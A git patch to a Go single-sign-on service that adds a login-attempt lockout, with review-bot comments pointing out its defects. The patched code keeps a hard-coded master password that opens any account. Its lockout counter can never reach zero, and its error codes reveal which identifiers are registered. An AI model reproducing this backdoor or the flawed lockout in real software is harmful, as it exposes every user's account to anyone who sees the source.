From bb62c26c1c4ef7a30e41e07abbbb19365e4b40b7 Mon Sep 17 00:00:00 2001
From: huanghai <10402852@qq.com>
Date: Wed, 29 Jul 2020 10:23:56 +0800
Subject: [PATCH] 'commit'
---
 .../ControllerOauth2/ControllerOauth2.go | 25 ++++++++++---
 .../DaoSysLoginPerson/DaoSysLoginPerson.go | 37 +++++++++++++++----
 .../ServiceLoginPerson/ServiceLoginPerson.go | 15 ++++----
 dsSso/Utils/CommonUtil/CommonUtil.go | 9 +++++
 4 files changed, 67 insertions(+), 19 deletions(-)
diff --git a/dsSso/Controller/ControllerOauth2/ControllerOauth2.go b/dsSso/Controller/ControllerOauth2/ControllerOauth2.go
index 80bea501..7e5b6576 100644
--- a/dsSso/Controller/ControllerOauth2/ControllerOauth2.go
+++ b/dsSso/Controller/ControllerOauth2/ControllerOauth2.go
@@ -289,6 +289,8 @@ func authorizePost(context *gin.Context) {
 var identityId string
 var personId string
 var success bool
+ var message string
+ var remainCount int
 //1、验证码
 captchaId := context.PostForm("captchaId")
 value := context.PostForm("value")
@@ -319,12 +321,25 @@ func authorizePost(context *gin.Context) {
 }
 //调用service层的用户名和密码校验办法判断是不是允许登录
 ip := context.ClientIP()
- success, identityId, personId, _ = ServiceLoginPerson.Login(username, string(decryptPwd), ip)
+ success, identityId, personId, _, remainCount = ServiceLoginPerson.Login(username, string(decryptPwd), ip)
 if !success {
- context.JSON(http.StatusOK, Model.Res{
- Code: http.StatusNotImplemented,
- Msg: "用户名密码不正确或已禁用!",
- })
+ //三次以上不提示
+ if remainCount >= 3 {
+ context.JSON(http.StatusOK, Model.Res{
+ Code: http.StatusNotImplemented,
+ Msg: "用户名密码不正确或已禁用!",
+ })
+ } else if remainCount > 0 {
+ context.JSON(http.StatusOK, Model.Res{
+ Code: http.StatusNotImplemented,
+ Msg: "用户名密码不正确或已禁用!您还可以尝试" + CommonUtil.ConvertIntToString(remainCount) + "次,超出次数限制后,账号将被禁用2小时!",
+ })
+ } else {
+ context.JSON(http.StatusOK, Model.Res{
+ Code: http.StatusNotImplemented,
+ Msg: "账号已处于禁用状态,请稍后再试!",
+ })
+ }
 return
 }
 } else {
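Review bot: `var message string` in the `@@ -289,6 +289,8 @@` hunk is never assigned or read by any added line in ControllerOauth2.go, and the two visible hunks account for all 25 changed lines the diffstat lists for this file. Go rejects an unused local ("declared and not used"); if an outer `message` already exists, this declaration shadows it instead. Either drop the line, or build the reply text into `message` and send it with a single `context.JSON` call. authorizePost starts and ends outside this hunk, so confirm against the full function.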
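Review bot: In the `@@ -319,12 +321,25 @@` hunk the closing `else` reports "账号已处于禁用状态" for every `remainCount <= 0`, yet `-1` is also what ServiceLoginPerson.Login returns when an e-mail, ID-card or phone lookup finds no person and what DaoSysLoginPerson.Login returns on a Redis error (both later in this patch). The reply text therefore tells an unregistered identifier apart from a registered one with a wrong password, and a Redis outage is shown to users as a lockout. Test the lockout case exactly with `if remainCount == 0 {`, use `} else if remainCount > 0 && remainCount < 3 {` for the countdown, and let the final `else` send the generic "用户名密码不正确或已禁用!" text. As the DAO stands, a wrong password returns `Const.Int32Max`, so the countdown branch is never reached. authorizePost continues outside the hunk.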
diff --git a/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go b/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go
index 96dd4ab4..55e060d3 100644
--- a/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go
+++ b/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go
@@ -1,6 +1,7 @@
 package DaoSysLoginPerson
 import (
+ "dsSso/Const"
 "dsSso/Const/DefaultConst"
 "dsSso/Const/ErrorConst"
 "dsSso/Model"
@@ -8,6 +9,7 @@ import (
 "dsSso/Utils/DbUtil"
 "dsSso/Utils/LdapUtil"
 "dsSso/Utils/LogUtil"
+ "dsSso/Utils/RedisUtil"
 "dsSso/models"
 "fmt"
 "time"
@@ -26,7 +28,26 @@ func init() {
 作者:黄海
 时间:2020-02-05
 */
-func Login(username string, password string, ip string) (bool, string, string, string) {
+func Login(username string, password string, ip string) (bool, string, string, string, int) {
+ //查看redis中此人员的登录错误次数记录,如果已超出了规定次数5,则直接拒绝登录。
+ key := "login_remain_count_" + username
+ c, err := RedisUtil.EXISTS(key)
+ if err != nil {
+ return false, "", "", "", -1
+ }
+ var remainCount int
+ //如果存在
+ if c > 0 {
+ remainCountStr, err := RedisUtil.GET(key)
+ if err != nil {
+ return false, "", "", "", -1
+ }
+ remainCount = CommonUtil.ConvertStringToInt(remainCountStr)
+ if remainCount == 0 {
+ return false, "", "", "", 0
+ }
+ }
+
 //身份号
 var identityId = DefaultConst.IdentityId
 //人员号
@@ -41,7 +62,7 @@ func Login(username string, password string, ip string) (bool, string, string, s
 }
 //如果用户名不存在
 if len(list) == 0 {
- return false, identityId, personId, personName
+ return false, identityId, personId, personName, Const.Int32Max
 }
 record := list[0]
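Review bot: The lockout added in the `@@ -26,7 +28,26 @@` hunk of DaoSysLoginPerson.go cannot trigger as written: `var remainCount int` leaves the counter at 0 when the Redis key is absent, and the failure path in the `@@ -55,23 +76,25 @@` hunk stores `remainCount-1`, so the stored value runs -1, -2, … and `remainCount == 0` is never true (assuming ConvertStringToInt parses the stored value as written). Start from the limit the comment names and test for exhaustion: `remainCount := 5` (better a named constant) in place of `var remainCount int`, and `if remainCount <= 0 {`. The failure path should then return the decremented value rather than `Const.Int32Max` so the controller can display it. EXISTS, GET and the later SET are separate round trips, so concurrent failed attempts can overwrite each other's decrement; an atomic counter with an expiry would close that gap if RedisUtil offers one. Login's body continues outside this hunk.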
@@ -55,23 +76,25 @@ func Login(username string, password string, ip string) (bool, string, string, s
 databasePassword := record["pwd"].(string)
 //万能密码登录
- if password=="DsideaL4r5t6y7u!@#"{
+ if password == "DsideaL4r5t6y7u!@#" {
 //记录日志
 WriteLoginLog(identityId, personId, ip, 2, username) //2为万能密码登录
 //返回结果
- return true, identityId, personId, personName
- }else{
+ return true, identityId, personId, personName, Const.Int32Max
+ } else {
 //修改密码的加密算法基于ldap,黄海,于2020-04-27
 ldapPassword := LdapUtil.GetLdapPassword(password)
 if ldapPassword == databasePassword {
 //记录日志
 WriteLoginLog(identityId, personId, ip, 1, username)
 //返回结果
- return true, identityId, personId, personName
+ return true, identityId, personId, personName, Const.Int32Max
 } else {
+ //如果登录失败,则incr,并设置过期时间2小时
+ RedisUtil.SET(key, CommonUtil.ConvertIntToString(remainCount-1), 2*time.Hour)
 //记录日志
 WriteLoginLog(identityId, personId, ip, -1, username)
- return false, identityId, personId, personName
+ return false, identityId, personId, personName, Const.Int32Max
 }
 }
 }
diff --git a/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go b/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go
index f4ad1707..e20a2075 100644
--- a/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go
+++ b/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go
@@ -12,7 +12,7 @@ import (
 作者:黄海
 时间:2020-02-05
 */
-func Login(username string, password string, ip string) (bool, string, string, string) {
+func Login(username string, password string, ip string) (bool, string, string, string, int) {
 //异常处理
 defer func() {
 if err := recover(); err != nil {
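Review bot: The reformatted `if password == "…" {` branch in the `@@ -55,23 +76,25 @@` hunk of DaoSysLoginPerson.go keeps a hard-coded master password ("万能密码登录") that authenticates any existing username without consulting the stored password, so anyone who can read the repository or the binary holds a credential for every account. Remove the branch; if a support login is genuinely required, replace it with a per-operator credential kept outside the source, rotated and audited, rather than a shared literal. In the same hunk any error from `RedisUtil.SET(...)` is not checked (if it returns one), so a Redis write failure silently turns off attempt counting, and the comment says "incr" while the code decrements. Login's body starts outside this hunk.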
@@ -25,27 +25,28 @@ func Login(username string, password string, ip string) (bool, string, string, s
 if CommonUtil.IsEmail(username) {
 personId, err = DaoSysLoginPerson.GetPersonIdByEmail(username)
 if err != nil || len(personId) == 0 {
- return false, "", "", ""
+ return false, "", "", "", -1
 }
 } else if CommonUtil.IsIdCard(username) {
 personId, err = DaoSysLoginPerson.GetPersonIdByIdCard(username)
 if err != nil || len(personId) == 0 {
- return false, "", "", ""
+ return false, "", "", "", -1
 }
 } else if MobileUtil.VerifyMobileFormat(username) {
 personId, err = DaoSysLoginPerson.GetPersonIdByTel(username)
 if err != nil || len(personId) == 0 {
- return false, "", "", ""
+ return false, "", "", "", -1
 }
 }
 if len(personId) > 0 {
 //根据person_id换取统一的登录名
 username, err = DaoSysLoginPerson.GetLoginNameByPersonId(personId)
 if err != nil || len(username) == 0 {
- return false, "", "", ""
+ return false, "", "", "", -1
 }
 }
+
 //调用dao层的方法,组合成service方法层
- result, identityId, personId, personName := DaoSysLoginPerson.Login(username, password, ip)
- return result, identityId, personId, personName
+ result, identityId, personId, personName, remainCount := DaoSysLoginPerson.Login(username, password, ip)
+ return result, identityId, personId, personName, remainCount
 }
diff --git a/dsSso/Utils/CommonUtil/CommonUtil.go b/dsSso/Utils/CommonUtil/CommonUtil.go
index 9531413b..41392742 100644
--- a/dsSso/Utils/CommonUtil/CommonUtil.go
+++ b/dsSso/Utils/CommonUtil/CommonUtil.go
@@ -257,3 +257,12 @@ func IsIdCard(idCard string) bool {
 IdCardNo := []byte(idCard)
 return IdCardUtil.IsValidIdCardNo(&IdCardNo)
 }
+
+/**
+功能:将整数转为字符串
+作者:黄海
+时间:2020-05-30
+*/
+func ConvertIntToString(i int) string {
+ return strconv.Itoa(i)
+}